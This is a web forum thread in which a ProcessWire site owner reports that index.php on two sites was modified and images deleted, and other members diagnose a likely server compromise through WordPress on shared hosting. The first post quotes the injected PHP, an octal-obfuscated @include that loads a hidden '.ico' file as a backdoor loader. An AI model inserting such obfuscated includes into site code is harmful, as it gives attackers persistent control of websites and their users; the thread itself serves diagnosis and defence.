Jump to content

Index.php changed and images deleted.


buster808
 Share

Recommended Posts

Hi,

Today both my live websites that are identical in build had there index.php changed to example below.
One of them also had lots of images deleted from asset/files deleted from folders.

Has anyone ever had an issue like this before? or any ideas of what this could be as I don't want to go through this again.

Thanks

<?php
/*dc5b4*/
 
@include "\057home\057xtra\143rea/\160ubli\143_htm\154/lee\163tint\163.co.\165k/wi\162e/mo\144ules\057Syst\145m/.d\1429f76\0664.ic\157";
 
/*dc5b4*/

 

Link to comment
Share on other sites

From what I can tell, some might have gained access to your server/account . I have seen this before with wordpress sites. Has anything with your server changed lately? Also, I would check with your host to check if this is not just effecting you. Just in the short term, I would change your ftp credentials.

  • Like 4
Link to comment
Share on other sites

That's quite strange. Running this through decoder suggests that this include is trying to load file from /wire/modules/System/.db9f7664.ico. Is this a path that exists on your site, and if so, what's in that file?

/wire/modules/System/ is a path where SystemUpdater and SystemNotifications live, but I'm not aware of anything that should create a file like that. Combined with files suddenly being removed and this file getting modified, it doesn't sound good.

The first thing to do would be to check the server, i.e. is it possible that someone has gained illegitimate access to it. Is this a shared host, a VPS, or something else entirely? Were both sites on the same host?

I'm not aware of any security issues with ProcessWire itself, but ProcessWire isn't immune to problems caused by someone gaining access to the server, directly or through another application (such as a WordPress installation – which has actually happened before).

  • Like 3
  • Thanks 1
Link to comment
Share on other sites

2 minutes ago, buster808 said:

Both sites are on a shared host and does have Wordpress websites on there.

 

Since you do have wordpress installs on the server, it wouldnt hurt to log in and check/update any passwords, make sure wordpress is updated (could help with any vulnerabilites with bug fixes etc), make sure that all themes and plugins are up to date as well.

 

Link to comment
Share on other sites

There are a few things that came up in my mind right now.

First I thought it looked like a failed git/SVN merge of some kind but afterwards it looked liked a failed upload from FileZilla. At least they both look pretty similar somehow.

As you stated that there are more instances of other sites and CMSs on that hosting you might want to try to set up different users for different sites. I guess you are using a US hosting company such as DreamH*st, H*stgator or Blueh*st, *2, or another 3.99/month mass-hosting ... I had several similar issues with these companies in the past - but to their rescue - they offer different users on a account to separate installations/instances of different sites.

TL;DR: what @teppo and @louisstephens say seems to be the case... someone got somehow access to that hosting. Maybe even through a nifty trick in W*rdPress.

  • Like 3
  • Thanks 1
Link to comment
Share on other sites

That's far from the best and ideal solution to go on vacation but did you change something within the path that @teppo mentioned?

Even if so... the index.php is still somewhere else than that path.

It's either weird or a good moment to change and set up a better and more secure environment.

  • Like 1
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...